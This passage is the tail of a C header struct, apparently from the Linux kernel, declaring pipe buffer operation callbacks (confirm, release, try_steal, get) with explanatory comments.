/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif